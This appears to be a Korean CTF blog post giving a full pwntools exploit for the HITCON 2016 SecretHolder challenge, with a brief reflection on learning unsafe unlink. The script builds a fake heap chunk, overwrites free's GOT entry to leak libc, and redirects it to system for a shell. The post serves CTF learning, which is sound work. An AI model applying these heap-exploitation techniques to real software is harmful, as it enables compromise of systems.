cdor1's lab
HITCON 2016 SecretHolder 본문
후기 : unsafe_unlink의 걔념과 디버깅의 중요성을 깨우치게 해준 고마운 문제이다.
또 다른 fake_chunk를 만들어 공격하는 문제를 풀어보고 싶다.
from pwn import *
s = remote('localhost', 4000)
elf = ELF('/home/cdor1/pwnable/SecretHolder')
libc = ELF('/home/cdor1/pwnable/libc.so.6_cdor1')
free_got = elf.got['free']
puts_plt = elf.plt['puts']
def keep(num, input):
print s.recvuntil('3. Renew secret')
s.sendline('1')
print s.recvuntil('3. Huge secret')
s.sendline(str(num))
print s.recvline()
s.sendline(input)
def wipe(num):
print s.recvuntil('3. Renew secret')
s.sendline('2')
print s.recvuntil('3. Huge secret')
s.sendline(str(num))
def renew(num, input):
print s.recvuntil('3. Renew secret')
s.sendline('3')
print s.recvuntil('3. Huge secret')
s.sendline(str(num))
print s.recvline()
s.send(input)
keep(1,'AAAA')
keep(2,'BBBB')
keep(3,'CCCC')
wipe(1)
wipe(2)
wipe(3)
keep(3,'CCCC')
wipe(1)
keep(1,'AAAA')
keep(2,'BBBB')
payload = p64(0x0)
payload += p64(0x21)
payload += p64(0x6020a8 - 24)
payload += p64(0x6020a8 - 16)
payload += p64(0x20)
payload += p64(0x90)
payload += "A"*0x80
payload += p64(0x90)
payload += p64(0x91)
payload += "B"*0x80
payload += p64(0x90)
payload += p64(0x21)
renew(3, payload)
raw_input()
wipe(2)
payload = p64(0)*3
payload += p64(free_got - 16)
renew(3, payload)
payload = p64(0)*2
payload += p64(puts_plt)
renew(3, payload)
sh = '/bin/sh;'
sh += 'A'*8
renew(1, sh)
wipe(1)
print s.recvuntil(sh)
leak = u64(s.recv(6)[0:8].ljust(8,'\x00'))
libc_base = leak - 0x3BE7B8
system_libc = libc_base + 0x46590
print '[*] main_arena : ' + hex(leak)
print '[*] libc_base : ' + hex(libc_base)
print '[*] libc_system : ' + hex(system_libc)
payload = p64(0)*2
payload += p64(system_libc)
renew(3, payload)
wipe(1)
s.interactive()
'Security > Pwnable' 카테고리의 다른 글
| unsafe unlink (0) | 2016.12.07 |
|---|---|
| 0ctf freenote (0) | 2016.12.06 |
| pwnable 문제 주의할 것 (0) | 2016.11.22 |
| Boston key party ctf 2016 cookbook (0) | 2016.11.22 |
| Top Chunk 구하기 (2) | 2016.11.18 |
Comments